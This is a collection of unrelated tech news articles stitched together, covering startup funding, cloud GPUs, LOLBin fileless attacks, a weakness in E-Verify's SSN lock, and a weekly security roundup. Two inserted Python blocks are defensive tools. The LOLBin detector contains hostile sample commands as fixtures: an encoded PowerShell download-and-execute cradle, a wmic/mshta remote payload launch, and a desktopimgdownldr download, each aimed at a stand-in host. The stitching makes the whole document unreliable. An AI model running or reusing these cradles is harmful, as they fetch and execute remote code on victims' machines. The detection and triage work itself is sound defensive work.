OwnBackup lands $50M as backup for Salesforce ecosystem thrives

OwnBackup has made a name for itself primarily as a backup and disaster recovery system for the Salesforce ecosystem, and today the company announced a $50 million investment.

Insight Partners led the round, with participation from Salesforce Ventures and Vertex Ventures. This chunk of money comes on top of a $23 million round from a year ago, and brings the total raised to more than $100 million, according to the company.

It shouldn’t come as a surprise that Salesforce Ventures chipped in when the majority of the company’s backup and recovery business involves the Salesforce ecosystem, although the company will be looking to expand beyond that with the new money.

“We’ve seen such growth over the last two and a half years around the Salesforce ecosystem, and the other ISV partners like Veeva and nCino that we’ve remained focused within the Salesforce space. But with this funding, we will expand over the next 12 months into a few new ecosystems,” company CEO Sam Gutmann told TechCrunch.

In spite of the pandemic, the company continues to grow, adding 250 new customers last quarter, bringing it to over 2,000 customers and 250 employees, according to Gutmann.

He says that raising the round, which closed at the beginning of May, had some hairy moments as the pandemic began to take hold across the world and worsen in the U.S. For a time, he began talking to new investors in case his existing ones got cold feet. As it turned out, when the quarterly numbers came in strong, the existing ones came back and the round was oversubscribed, Gutmann said.

“Q2 frankly was a record quarter for us, adding over 250 new accounts, and we’re seeing companies start to really understand how critical this is,” he said.

The company plans to continue hiring through the pandemic, although he says it might not be quite as aggressive as once planned. Like many companies, even though they plan to hire, they are continually assessing the market. At this point, he foresees growing the workforce by about another 50 people this year, but that’s about as far as he can look ahead right now.

Gutmann says he is working with his management team to make sure he has a diverse workforce right up to the executive level, but he says it’s challenging. “I think our lower ranks are actually quite diverse, but as you get up into the leadership team, you can see on the website unfortunately we’re not there yet,” he said.

They are instructing their recruiting teams to look for diverse candidates whether by gender or ethnicity, and employees have formed a diversity and inclusion task force with internal training, particularly for managers around interviewing techniques.

He says going remote has been difficult, and he misses seeing his employees in the office. He hopes to have at least some come back before the end of the summer and slowly add more as we get into the fall, but that will depend on how things go.

Zoom announces new Hardware as a Service offering to run on ServiceNow

Zoom announced a new Hardware as a Service offering today that will run on the ServiceNow platform. At the same time, the company announced a deal with ServiceNow to standardize on Zoom and Zoom Phone for its 11,000 employees in another case of SaaS cooperation.

For starters, the new Hardware as a Service offering allows customers who use Zoom Phone and Zoom Rooms to acquire the related hardware from the company for a fixed monthly cost. The company announced that initial solutions providers will include DTEN, Neat, Poly and Yealink.

The new service allows companies to access low-cost hardware and pay for the software and hardware on a single invoice. This could result in lower up-front costs, while simplifying the bookkeeping associated with a customer’s online communications options.

Companies can start small if they wish, then add additional hardware over time as needs change, and they can also opt for a fully managed service, where a third party can deal with installation and management of the hardware if that’s what a customer requires.

Zoom will run the new service on ServiceNow’s Now platform, which provides a way to manage the service requests as they come in. And in a case of one SaaS hand washing the other, ServiceNow has standardized on the Zoom platform for its internal communications tool, which has become increasingly important as the pandemic has moved employees to work from home. The company also plans to replace its current phone system with Zoom Phone.

One of the defining characteristics of SaaS companies, and a major difference from previous generations of tech companies, has been the willingness of these organizations to work together to string together sets of services when it makes sense. These kinds of partnerships not only benefit the companies involved, they tend to be a win for customers too.

Brent Leary, founder at CRM Essentials, sees this as a deal between two rising SaaS stars, and one that benefits both companies. “Everyone and their mother is announcing partnerships with Zoom, focusing on integrating video communications into core focus areas. But this partnership looks to be much more substantial than most, with ServiceNow not only partnering with Zoom for tighter video communication capabilities, but also displacing its current phone system with Zoom Phone,” Leary told TechCrunch.

Nvidia’s Ampere GPUs come to Google Cloud

Nvidia today announced that its new Ampere-based data center GPUs, the A100 Tensor Core GPUs, are now available in alpha on Google Cloud. As the name implies, these GPUs were designed for AI workloads, as well as data analytics and high-performance computing solutions.

The A100 promises a significant performance improvement over previous generations. Nvidia says the A100 can boost training and inference performance by over 20x compared to its predecessors (though you’ll mostly see 6x or 7x improvements in most benchmarks) and tops out at about 19.5 TFLOPs in single-precision performance and 156 TFLOPs for Tensor Float 32 workloads.


“Google Cloud customers often look to us to provide the latest hardware and software services to help them drive innovation on AI and scientific computing workloads,” said Manish Sainani, Director of Product Management at Google Cloud, in today’s announcement. “With our new A2 VM family, we are proud to be the first major cloud provider to market Nvidia A100 GPUs, just as we were with Nvidia’s T4 GPUs. We are excited to see what our customers will do with these new capabilities.”

Google Cloud users can get access to instances with up to 16 of these A100 GPUs, for a total of 640GB of GPU memory and 1.3TB of system memory.

How Do Attackers Use LOLBins In Fileless Attacks?

For malware authors, the idea of exploiting existing software on a user’s machine to achieve malicious purposes has a lot of attractions. For one, it means less work for them in developing custom malware. For another, it means less chance of being detected. After all, if you can hijack an existing and trusted piece of software to achieve your ends, the chances are better that you’ll go undetected. This technique, known as “Living off the Land”, has a long history, but it’s not getting old.

New “Living off the Land” binaries, or LOLBins, can appear with any software or OS update, or may have been lying around with undocumented abilities for some time: researchers at SentinelLabs just disclosed a previously unknown LOLBin, for example. In this post, we dig into what LOLBins are, why they are a concern, and most importantly how you can detect their malicious use.

What is a LOLBin?

Any executable that comes installed as part of your operating system by default and that can be used to further an attack can be considered a LOLBin. In addition, executables added by users for legitimate purposes can be exploited as LOLBins, particularly when they are part of some common or widely used third-party software installation.

What makes an executable a LOLBin is less its origin than whether it was already present on the system before the malware arrived.

In such cases, that executable is likely to be treated without suspicion by both users and admins and potentially even whitelisted as benign by some security tools.

In targeted attacks, an actor may first surveil a system for LOLBins unique to the victim’s environment, but typically attackers are interested in efficiency and prefer to write malware that uses commonly found executables: scripting engines like bash and PowerShell, and utilities like msiexec, PsExec and desktopimgdownldr that have unexpected or little-known capabilities useful to threat actors (PsExec is a Sysinternals tool rather than an OS component, but it is installed widely enough in enterprise environments to serve the same purpose). On macOS, osascript is a LOLBin widely exploited by attackers to execute malicious AppleScripts.

Aside from being potentially ignored by both users and security tools, LOLBins like those just mentioned can allow malicious actors to communicate with remote servers and blend in with typical network activity. Other LOLBins may help attackers to perform functions such as compile code, achieve persistence, dump processes and hijack DLLs.

How Do Attackers Use LOLBins In Fileless Attacks?

Fileless attacks have been increasing in recent years, although there is some misunderstanding about exactly what makes an attack ‘fileless’. Such attacks may still be initiated through documents (like email attachments) and they may leave behind files (like persistence agents), but what makes them fileless is that the code is executed in-memory.

The main idea behind a fileless attack is that code execution occurs in-memory rather than by spawning a process that executes compiled code from a source file.

This means that the attack cannot be detected just by scanning a system for malicious binaries or executable files. In addition, once memory has been purged (such as by a reboot) there may be little or no evidence of the attack for incident responders and threat hunters to detect.

A typical scenario for a fileless attack might begin with a phishing attempt in which the target is socially engineered to open a malicious link or attachment. This may execute JavaScript or VBScript, or call a LOLBin like PowerShell, to download and execute malicious code in memory.

This second-stage payload may go on to use other LOLBins, such as WMI (Windows Management Instrumentation, typically driven through wmic.exe or PowerShell’s WMI cmdlets), to achieve persistence, open a backdoor or contact a C2 server to exfiltrate data. Fileless attacks may be combined with other threats such as ransomware and keyloggers.

What Are Some Examples of Fileless Attacks Using LOLBins?

Fileless attacks using LOLBins are quite common and have been documented on Windows, Linux and Mac platforms. Indeed, insofar as the attack can hijack native tools that either exist on all platforms or have equivalents, these kinds of attacks can be platform-agnostic. APT group Lazarus, for example, has been observed distributing MS Word documents that will execute an in-memory attack using LOLBins regardless of whether the attachment is opened on Windows or a Mac.


Among the more high-profile attacks that leveraged LOLBins and a fileless attack vector were those on the DNC (Democratic National Committee) during the 2016 US election year and the attack on Equifax in 2017, which resulted in billion-dollar losses for the company and the exposure of records belonging to nearly 150 million people.

Why Do Security Researchers Worry About LOLBins?

As we have seen, LOLBins present a problem because they are a legitimate part of the environment that can be coerced into doing the threat actors’ work for them. Of course, some LOLBins like PowerShell are well known and can be monitored and/or locked down to prevent abuse.

However, keeping an inventory of the functionality of every legitimate executable on the system, and of whether it could be leveraged for malicious purposes, isn’t really practical. Not only do operating systems ship a vast number of built-in binaries that are added to or updated with new functionality all the time; there is also a massive amount of widely used third-party software in the enterprise environment whose full functionality may not be documented.

As a result, security practitioners are continually engaged in research to unearth new or undiscovered LOLBins before attackers do.

But even when discovered, there remains the problem of how to deal with the use of that legitimate tool to ensure it is being used only for its intended purpose.

How Can You Detect the Malicious Use of LOLBins?

With no recognizable file signature and ever-changing C2 IP addresses, security teams can be drawn into a wearying game of whack-a-mole, chasing stealthy attacks that their current tools are not equipped to handle.

In many scenarios, it is simply not effective to block LOLBins that may be essential to the productivity of some of the teams in your organization.

The key to defeating attacks leveraging LOLBins lies in a behavioral AI engine that can detect malicious behavior based on what code does, rather than where it comes from. Rather than inspecting files to see if they contain malicious code, a behavioral AI engine looks at activity on the endpoint and distinguishes between malicious and benign activity.

Using contextual information, the agent can not only recognize that some activity is malicious, but can also distinguish the source of the malicious activity without laying the blame at the door of the native tool invoked by the malicious process.
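The parent/child and command-line heuristics such an engine applies to the chain described above (an Office or script host spawning PowerShell, an encoded command hiding a download cradle, WMI spawning processes, and the certutil, regsvr32 and desktopimgdownldr download tricks), as an added example in Python. This is not SentinelOne’s code; the Sysmon-style events, host addresses and paths are constructed for the demonstration.

```python
"""Behavioural triage of process-creation events for LOLBin abuse.

Added example (not SentinelOne code). Input is a Sysmon-style process
creation record: parent image, image, command line. The heuristics encode
the chain described in the post: an Office or script host parent spawning a
LOLBin, an encoded PowerShell command hiding a download cradle, WMI used to
spawn processes, and known download tricks in certutil, regsvr32 and
desktopimgdownldr. All sample events below are constructed.
"""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# Parents that rarely have a legitimate reason to spawn a shell or script host
SUSPICIOUS_PARENTS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
    "wscript.exe", "cscript.exe", "mshta.exe",
}

# Native binaries commonly abused as LOLBins
LOLBINS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "wmic.exe", "mshta.exe",
    "regsvr32.exe", "rundll32.exe", "certutil.exe", "msiexec.exe",
    "bitsadmin.exe", "desktopimgdownldr.exe",
}

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc)
ENC_RE = re.compile(r"(?<!\S)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

CMDLINE_RULES = [
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I), "download cradle"),
    (re.compile(r"\biex\b|invoke-expression", re.I), "in-memory execution (IEX)"),
    (re.compile(r"(?<!\S)-w\w*\s+hidden", re.I), "hidden window"),
    (re.compile(r"process\s+call\s+create", re.I), "WMI process creation"),
    (re.compile(r"certutil.*-urlcache", re.I), "certutil download"),
    (re.compile(r"regsvr32.*/i:https?://", re.I), "regsvr32 remote scriptlet"),
    (re.compile(r"/lockscreenurl:https?://", re.I), "desktopimgdownldr download"),
]


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the UTF-16LE payload of an -EncodedCommand argument, or None."""
    m = ENC_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # not base64 / not UTF-16: leave it
        return None


def analyze(event: ProcessEvent) -> List[str]:
    """Return the suspicious traits found in one event (empty list = benign)."""
    findings: List[str] = []
    parent = event.parent_image.rsplit("\\", 1)[-1].lower()
    child = event.image.rsplit("\\", 1)[-1].lower()
    if parent in SUSPICIOUS_PARENTS and child in LOLBINS:
        findings.append(f"{parent} spawned {child}")

    text = event.command_line
    decoded = decode_encoded_command(text)
    if decoded is not None:
        findings.append("encoded PowerShell command")
        text = f"{text} {decoded}"  # scan the decoded payload as well
    for rule, label in CMDLINE_RULES:
        if rule.search(text):
            findings.append(label)
    return findings


# Constructed stage-one cradle, encoded the way a malicious macro would encode it
STAGE1 = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s.ps1')"
STAGE1_B64 = base64.b64encode(STAGE1.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 f"powershell.exe -NoP -W Hidden -enc {STAGE1_B64}"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\wbem\WMIC.exe",
                 'wmic process call create "mshta http://198.51.100.7/p.hta"'),
    ProcessEvent(r"C:\Windows\System32\wscript.exe",
                 r"C:\Windows\System32\cmd.exe",
                 r"cmd.exe /c set SYSTEMROOT=C:\Windows\Temp && desktopimgdownldr.exe "
                 r"/lockscreenurl:http://198.51.100.7/x.bin /eventName:desktopimgdownldr"),
    ProcessEvent(r"C:\Windows\explorer.exe",  # benign admin script: no findings
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -NoProfile -File C:\scripts\inventory.ps1"),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev.image.rsplit("\\", 1)[-1], "->", analyze(ev) or "benign")
```

Run as a script it prints the findings per event. The decoder handles the -e/-ec/-enc prefixes PowerShell accepts, which plain string matches on "-EncodedCommand" miss, and the decoded payload is scanned with the same rules so a cradle hidden in base64 surfaces as "download cradle". Note that a single trait (a hidden window, say) is not a verdict; the value is in the combination of parent, image and command-line context, which is what lets the benign inventory script through while the Word-spawned cradle is flagged.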

Conclusion

Stealth is one of every threat actor’s primary objectives, and natively existing binaries, LOLBins, provide perfect camouflage for malware that wants to hide in plain sight. While it’s vital that we continue to research the capabilities in our environment, the task of detecting malicious processes on execution regardless of their source is one that readily lends itself to an automated, machine learning algorithm. If you would like to see how SentinelOne can help protect your organization against all kinds of threat actors, contact us for a free demo.


E-Verify’s “SSN Lock” is Nothing of the Sort

One of the most-read advice columns on this site is a 2018 piece called “Plant Your Flag, Mark Your Territory,” which tried to impress upon readers the importance of creating accounts at websites like those at the Social Security Administration, the IRS and others before crooks do it for you. A key concept here is that these services only allow one account per Social Security number — which for better or worse is the de facto national identifier in the United States. But KrebsOnSecurity recently discovered that this is not the case with all federal government sites built to help you manage your identity online.

A reader who was recently the victim of unemployment insurance fraud said he was told he should create an account at the Department of Homeland Security’s myE-Verify website, and place a lock on his Social Security number (SSN) to minimize the chances that ID thieves might abuse his identity for employment fraud in the future.


According to the website, roughly 600,000 employers at over 1.9 million hiring sites use E-Verify to confirm the employment eligibility of new employees. E-Verify’s consumer-facing portal myE-Verify lets users track and manage employment inquiries made through the E-Verify system. It also features a “Self Lock” designed to prevent the misuse of one’s SSN in E-Verify.

Enabling this lock is supposed to mean that for the next year thereafter, if an unauthorized individual attempts to fraudulently use a SSN for employment authorization, he or she cannot use the SSN in E-Verify, even if the SSN is that of an employment authorized individual. But in practice, this service may actually do little to deter ID thieves from impersonating you to a potential employer.

At the request of the reader who reached out (and in the interest of following my own advice to plant one’s flag), KrebsOnSecurity decided to sign up for a myE-Verify account. After verifying my email address, I was asked to pick a strong password and select a form of multi-factor authentication (MFA). The most secure MFA option offered (a one-time code generated by an app like Google Authenticator or Authy) was already pre-selected, so I chose that.

The site requested my name, address, SSN, date of birth and phone number. I was then asked to select five questions and answers that might be asked if I were to try to reset my password, such as “In what city/town did you meet your spouse,” and “What is the name of the company of your first paid job.” I chose long, gibberish answers that had nothing to do with the questions (yes, these password questions are next to useless for security and frequently are the cause of account takeovers, but we’ll get to that in a minute).

Password reset questions selected, the site proceeded to ask four, multiple-guess “knowledge-based authentication” questions to verify my identity. The U.S. Federal Trade Commission’s primer page on preventing job-related ID theft says people who have placed a security freeze on their credit files with the major credit bureaus will need to lift or thaw the freeze before being able to answer these questions successfully at myE-Verify. However, I did not find that to be the case, even though my credit file has been frozen with the major bureaus for years.

After successfully answering the KBA questions (the answer to each was “none of the above,” by the way), the site declared I’d successfully created my account! I could then see that I had the option to place a “Self Lock” on my SSN within the E-Verify system.

Doing so required me to pick three more challenge questions and answers. The site didn’t explain why it was asking me to do this, but I assumed it would prompt me for the answers in the event that I later chose to unlock my SSN within E-Verify.

After selecting and answering those questions and clicking the “Lock my SSN” button, the site generated an error message saying something went wrong and it couldn’t proceed.

Alas, logging out and logging back in again showed that the site did in fact proceed and that my SSN was locked. Joy.

But I still had to know one thing: Could someone else come along pretending to be me and create another account using my SSN, date of birth and address but under a different email address? Using a different browser and Internet address, I proceeded to find out.

Imagine my surprise when I was able to create a separate account as me with just a different email address (once again, the correct answers to all of the KBA questions were “none of the above”). Upon logging in, I noticed my SSN was indeed locked within E-Verify. So I chose to unlock it.

Did the system ask any of the challenge questions it had me create previously? Nope. It just reported that my SSN was now unlocked. Logging out and logging back in to the original account I created (again under a different IP and browser) confirmed that my SSN was unlocked.

ANALYSIS

Obviously, if the E-Verify system allows multiple accounts to be created using the same name, address, phone number, SSN and date of birth, this is less than ideal and somewhat defeats the purpose of creating one for the purposes of protecting one’s identity from misuse.

Lest you think your SSN and DOB are somehow private information, you should know this static data about U.S. residents has been exposed many times over in countless data breaches, and in any case these digits are available for sale on most Americans via Dark Web sites for roughly the bitcoin equivalent of a fancy caffeinated drink at Starbucks.

Being unable to proceed through knowledge-based authentication questions without first unfreezing one’s credit file with one or all of the big three credit bureaus (Equifax, Experian and TransUnion) can actually be a plus for those of us who are paranoid about identity theft. I couldn’t find any mention on the E-Verify site of which company or service it uses to ask these questions, but the fact that the site doesn’t seem to care whether one has a freeze in place is troubling.

And when the correct answer to all of the KBA questions that do get asked is invariably “none of the above,” that somewhat lessens the value of asking them in the first place. Maybe that was just the luck of the draw in my case, but also troubling nonetheless. Either way, these KBA questions are notoriously weak security because the answers to them often are pulled from records that are public anyway, and can sometimes be deduced by studying the information available on a target’s social media profiles.

Speaking of silly questions, relying on “secret questions” or “challenge questions” as an alternative method of resetting one’s password is severely outdated and insecure. A 2015 study by Google titled “Secrets, Lies and Account Recovery” (PDF) found that secret questions generally offer a security level that is far lower than just user-chosen passwords. Also, the idea that an account protected by multi-factor authentication could be undermined by successfully guessing the answer(s) to one or more secret questions (answered truthfully and perhaps located by thieves through mining one’s social media accounts) is bothersome.

Finally, the advice given to the reader whose inquiry originally prompted me to sign up at myE-Verify doesn’t seem to have anything to do with preventing ID thieves from fraudulently claiming unemployment insurance benefits in one’s name at the state level. KrebsOnSecurity followed up with four different readers who left comments on this site about being victims of unemployment fraud recently, and none of them saw any inquiries about this in their myE-Verify accounts after creating them. Not that they should have seen signs of this activity in the E-Verify system; I just wanted to emphasize that one seems to have little to do with the other.

The Good, the Bad and the Ugly in Cybersecurity – Week 27

The Good

Another high-profile cybercriminal has received a well-deserved sentence from a federal judge in Alexandria, VA. Aleksei Burkov, who pleaded guilty in January, was charged with conspiracy to commit computer intrusion, device fraud, identity theft, and money laundering stemming from his involvement with two well-known forums. Both forums, one of which was Cardplanet, were long-standing gathering places for cybercriminals to meet and trade stolen information.

The second forum involved was a much more guarded and heavily vetted environment. The upper echelon would pay $5,000 for the privilege of access to the forum and associated services from the participants. Burkov potentially faced 15 years of prison time after being extradited to the United States in November of 2019.

Ultimately the judge sentenced him to nine years, noting that Burkov had already been incarcerated since 2015. It is estimated that the forums collectively facilitated nearly $20 million in credit card fraud and other identity-based crimes. It’s always good to see these cases end in a positive way (for the good guys!).

The Bad

This week, macOS security got a nasty shock in the form of a rare ransomware threat targeting the platform. Dubbed variously “EvilQuest”, “ThiefQuest” and “MacRansom.K”, this trojan displays both data stealing and encryption (ransomware) traits.

The lure and delivery of the trojan are all too familiar, unfortunately. The malware has been spreading via torrents offering pirated or “cracked” versions of a number of popular macOS applications including Ableton Live, Mixed in Key, and Little Snitch. The malware arrives as a .DMG file containing a package-based installer for the trojanized application. Upon launch, the installer requests elevated privileges, establishes both user-level and root-level persistence, and proceeds to activate additional functionality. Files do indeed get encrypted at this point; however, additional behaviors follow that lengthen the list of malicious activities. “EvilQuest” appears to install a keylogger as well as a reverse shell, potentially allowing the threat actor direct and ongoing access. The malware also retrieves multiple remote scripts, one of which is used specifically for file exfiltration.

The trojan recursively seeks all files under the /Users folder matching a hard-coded extension list and transmits them externally. Others have noted that there is a limit on the size of file that can be transferred (800 KB), which may prevent exfiltration of various file types (.wallet, for example). In addition, there seem to be some issues with the encryption itself, in that file types beyond the hard-coded extension set could end up encrypted.

Although analysis is still ongoing, this unusually complex (for macOS) malware looks like a first attempt at targeting the Apple Mac platform with malware that has the same kind of combined ransomware/wiper plus data stealing capabilities seen in malware families hitting the Windows universe of late (e.g., Ragnar, Netwalker, Snake). Expect it not to be the last.

The Ugly

In perhaps this week’s most serious security news, US-CERT, along with many other agencies, released alerts concerning a critical vulnerability in Palo Alto Networks’ PAN-OS. The flaw, assigned CVE-2020-2021, is an authentication bypass in PAN-OS SAML authentication: signatures on SAML messages are not properly verified, so an unauthenticated attacker with network access to a SAML-protected interface can log in to it without valid credentials. On the web management interface that amounts to full administrative control of the device, including opening up interfaces for later stages of the attack or modifying permissions on existing accounts; on VPN gateways and captive portals it means session access as a legitimate user.

The problematic SAML implementation lives in PAN-OS itself, so it affects everything running it that authenticates via SAML: GlobalProtect Gateway, Portal and Clientless VPN, Prisma Access, Authentication and Captive Portal, and the PAN-OS and Panorama web interfaces. VPN gateways and firewalls are two big places you want to keep attackers out of. Two preconditions must both hold for the bypass to be reachable: SAML authentication is enabled, and the “Validate Identity Provider Certificate” option is disabled (unchecked) in the SAML Identity Provider Server Profile. Palo Alto Networks posted their advisory on June 29th with mitigation and workaround instructions: switch affected authentication profiles to a non-SAML method until you can upgrade, or enable IdP certificate validation (which requires a CA-signed IdP certificate, the reason many deployments had it unchecked). The fix has been released in PAN-OS 8.1.15, 9.0.9, 9.1.3 and later; PAN-OS 8.0 is end-of-life and will not be fixed, and 7.1 is not affected.

This is a critical flaw, and thankfully (this time) the vendor has provided a fix in a timely and well-communicated manner. We encourage all to review their exposure to this vulnerability and take the required steps to mitigate. Keeping all applications and services up to date and at the latest patch level, while not always straightforward, is paramount as we strive to defend our networks against current and future attacks.
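A triage check for the exposure described above, as an added example in Python (not Palo Alto Networks’ code): it parses PAN-OS version strings, including hotfix suffixes, compares them against the fixed release in each branch, and applies the two advisory preconditions. The fixed versions and preconditions are as stated in the June 2020 advisory and should be re-checked against its current text before acting on the output; the device inventory is constructed.

```python
"""Exposure triage for CVE-2020-2021 (PAN-OS SAML authentication bypass).

Added example, not Palo Alto Networks code. The fixed versions (8.1.15,
9.0.9, 9.1.3), the "all of 8.0 affected / 7.1 not affected" entries and the
two preconditions (SAML enabled, Validate Identity Provider Certificate
disabled) are taken from the vendor advisory as published in June 2020;
confirm them against the current advisory before relying on the output.
The device inventory below is constructed.
"""
import re
from dataclasses import dataclass
from typing import Tuple

# Branch -> first maintenance release that contains the fix
FIXED_IN = {(8, 1): 15, (9, 0): 9, (9, 1): 3}
ALWAYS_AFFECTED = {(8, 0)}  # end-of-life branch with no fix
NOT_AFFECTED = {(7, 1)}

# e.g. "9.1.2", "8.1.14-h1" (a hotfix suffix does not change the maintenance number)
VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-h(\d+))?$")


def parse_version(version: str) -> Tuple[int, int, int, int]:
    """Split a PAN-OS version string into (major, minor, maintenance, hotfix)."""
    m = VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised PAN-OS version: {version!r}")
    major, minor, maint, hotfix = m.groups()
    return int(major), int(minor), int(maint), int(hotfix or 0)


def version_is_fixed(version: str) -> bool:
    """True when this release is outside the advisory's affected ranges."""
    major, minor, maint, _ = parse_version(version)
    branch = (major, minor)
    if branch in NOT_AFFECTED:
        return True
    if branch in ALWAYS_AFFECTED:
        return False
    if branch in FIXED_IN:
        return maint >= FIXED_IN[branch]
    # Assumption: branches newer than 9.1 shipped after the fix. Anything older
    # and not listed is treated as affected so it is not silently ignored.
    return branch > max(FIXED_IN)


@dataclass
class Device:
    name: str
    version: str
    saml_enabled: bool       # any authentication profile uses SAML
    validate_idp_cert: bool  # "Validate Identity Provider Certificate" in the IdP server profile


def assess(device: Device) -> str:
    """Return 'not_vulnerable', 'config_mitigated' or 'vulnerable'."""
    if version_is_fixed(device.version):
        return "not_vulnerable"
    if not device.saml_enabled or device.validate_idp_cert:
        # Precondition not met: the bypass is not reachable, but the flawed code
        # is still present, so patch before anyone changes the auth profile.
        return "config_mitigated"
    return "vulnerable"


# Constructed inventory
INVENTORY = [
    Device("fw-edge-1", "9.1.2", saml_enabled=True, validate_idp_cert=False),
    Device("fw-edge-2", "9.1.3", saml_enabled=True, validate_idp_cert=False),
    Device("gp-gw-1", "8.1.14-h1", saml_enabled=True, validate_idp_cert=True),
    Device("fw-dc-1", "8.0.20", saml_enabled=True, validate_idp_cert=False),
    Device("fw-lab", "9.0.8", saml_enabled=False, validate_idp_cert=False),
    Device("fw-legacy", "7.1.26", saml_enabled=True, validate_idp_cert=False),
]

if __name__ == "__main__":
    for d in INVENTORY:
        print(f"{d.name:10} {d.version:10} {assess(d)}")
```

The two configuration flags are the part most version-only scanners miss: a device on 9.1.2 with IdP certificate validation enabled is not exploitable today, but it is one profile edit away from being so, which is why it is reported as mitigated rather than safe. Hotfix builds such as 8.1.14-h1 compare on the maintenance number, so they are correctly treated as older than 8.1.15.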


QuestDB nabs $2.3M seed to build open source time series database

QuestDB, a member of the Y Combinator summer 2020 cohort, is building an open source time series database with speed top of mind. Today the startup announced a $2.3 million seed round.

Episode1 Ventures led the round with assistance from Seedcamp, 7percent Ventures, YCombinator, Kima Ventures and several unnamed angel investors.

The database was originally conceived in 2013 when current CTO Vlad Ilyushchenko was building trading systems for a financial services company and he was frustrated by the performance limitations of the databases available at the time, so he began building a database that could handle large amounts of data and process it extremely fast.

For a number of years, QuestDB was a side project, a labor of love for Ilyushchenko until he met his other co-founders Nicolas Hourcard, who became CEO and Tancrede Collard, who became CPO, and the three decided to build a startup on top of the open source project last year.

“We’re building an open source database for time series data, and time series databases are a multi-billion-dollar market because they’re central for financial services, IoT and other enterprise applications. And we basically make it easy to handle explosive amounts of data, and to reduce infrastructure costs massively,” Hourcard told TechCrunch.

He adds that it’s also about high performance. “We recently released a demo that you can access from our website that enables you to query a super large dataset — 1.6 billion rows with sub-second queries, mostly, and that just illustrates how performant the software is,” he said.

He sees open source as a way to build adoption from the bottom up inside organizations, winning the hearts and minds of developers first, then moving deeper in the company when they eventually build a managed cloud version of the product. For now, being open source also helps them as a small team to have a community of contributors help build the database and add to its feature set.

“We’ve got this open source product that is free to use, and it’s pretty important for us to have such a distribution model because we can basically empower developers to solve their problems, and we can ask for contributions from various communities. […] And this is really a way to spur adoption,” Hourcard said.

He says that working with YC has allowed them to talk to other companies in the ecosystem who have built similar open source-based startups and that’s been helpful, but it has also helped them learn to set and meet goals and have access to some of the biggest names in Silicon Valley, including Marc Andreessen, who delivered a talk to the cohort the same day we spoke.

Today the company has seven employees, including the three founders, spread out across the US, EU and South America. He sees this geographic diversity helping when it comes to building a diverse team in the future. “We definitely want to have more diverse backgrounds to make sure that we keep having a diverse team and we’re very strongly committed to that.”

For the short term, the company wants to continue building its community, working on continuing to improve the open source product, while working on the managed cloud product.

SEC filing indicates big data provider Palantir is raising $961M, $550M of it already secured

Palantir, the sometimes controversial, but always secretive, big data and analytics provider that works with governments and other public and private organizations to power national security, health and a variety of other services, has reportedly been eyeing a public listing this autumn. But in the meantime it’s also continuing to push ahead in the private markets.

The company has filed a Form D — its first in four years — indicating that it is in the process of raising nearly $1 billion — $961,099,010, to be exact — with $549,727,437 of that already sold, and a further $411,371,573 remaining to be raised.

It’s not clear if this fundraise would essentially mean a delay to a public listing, or if it would complement it. Nor is it clear whether this filing additionally covers secondary or previously undisclosed funding that it is now getting in order ahead of a public listing. The Form D notes that 58 investors have already invested in the offering, which might indicate that at least some of this is secondary, and that “of the total remaining to be sold, all but $671,576.25 represents shares of common stock already subscribed for.”

The filing, alternatively, could confirm a report from back in September 2019 that the company was seeking to raise between $1 billion and $3 billion, its first fundraising in four years. That report noted Palantir was targeting a $26 billion valuation, up from $20 billion four years ago. A Reuters article from June put its valuation on secondary market trades at between $10 billion and $14 billion.

The bigger story of that Reuters report was that Palantir said in June that it had closed funding from two strategic investors that both work with the company: $500 million in funding from Japanese insurance company Sompo Holdings, and $50 million from Fujitsu. Together, these might account for the $550 million already sold on the Form D.

To date, Palantir has raised $3.3 billion in funding, according to PitchBook data, which names no fewer than 108 investors on its cap table.

If you dig into the PitchBook data (some of which is behind a paywall), it also seems that Palantir has raised a number of other rounds of undisclosed amounts. Confusingly (but probably aptly for a company famous for being secretive), some of that might also be part of this Form D amount.

We have reached out to Palantir to ask about the Form D and will update this post as we learn more.

While Palantir was last valued at $20 billion when it raised money four years ago, there are some data points that point to a bigger valuation today.

In April, according to a Bloomberg report, the company briefed investors with documents showing that it expects to make $1 billion in revenues this year, up 38% on 2019, and to break even for the first time since being founded 16 years ago by Peter Thiel, Nathan Gettings, Joe Lonsdale, Stephen Cohen and current CEO Alex Karp.

(The Bloomberg report didn’t explain why Palantir was briefing investors, whether for a potential public listing, or for the fundraise we’re reporting on here, or something else.)

On top of that, the company has been in the news a lot around the global novel coronavirus pandemic. Specifically, it’s been winning business, in the form of projects in major markets like the U.K. (where it’s part of a consortium of companies working with the NHS on a COVID-19 data trove) and the U.S. (where it’s been working on a COVID-19 tracker for the federal government and a project with the CDC), and possibly others. Those projects will presumably need a lot of upfront capital to set up and run, possibly one reason it is raising money now.

Ransomware Gangs Don’t Need PR Help

We’ve seen an ugly trend recently of tech news stories and cybersecurity firms trumpeting claims of ransomware attacks on companies large and small, apparently based on little more than the say-so of the ransomware gangs themselves. Such coverage is potentially quite harmful and plays deftly into the hands of organized crime.

Often the rationale behind couching these events as newsworthy is that the attacks involve publicly traded companies or recognizable brands, and that investors and the public have a right to know. But absent any additional information from the victim company or their partners who may be affected by the attack, these kinds of stories and blog posts look a great deal like ambulance chasing and sensationalism.

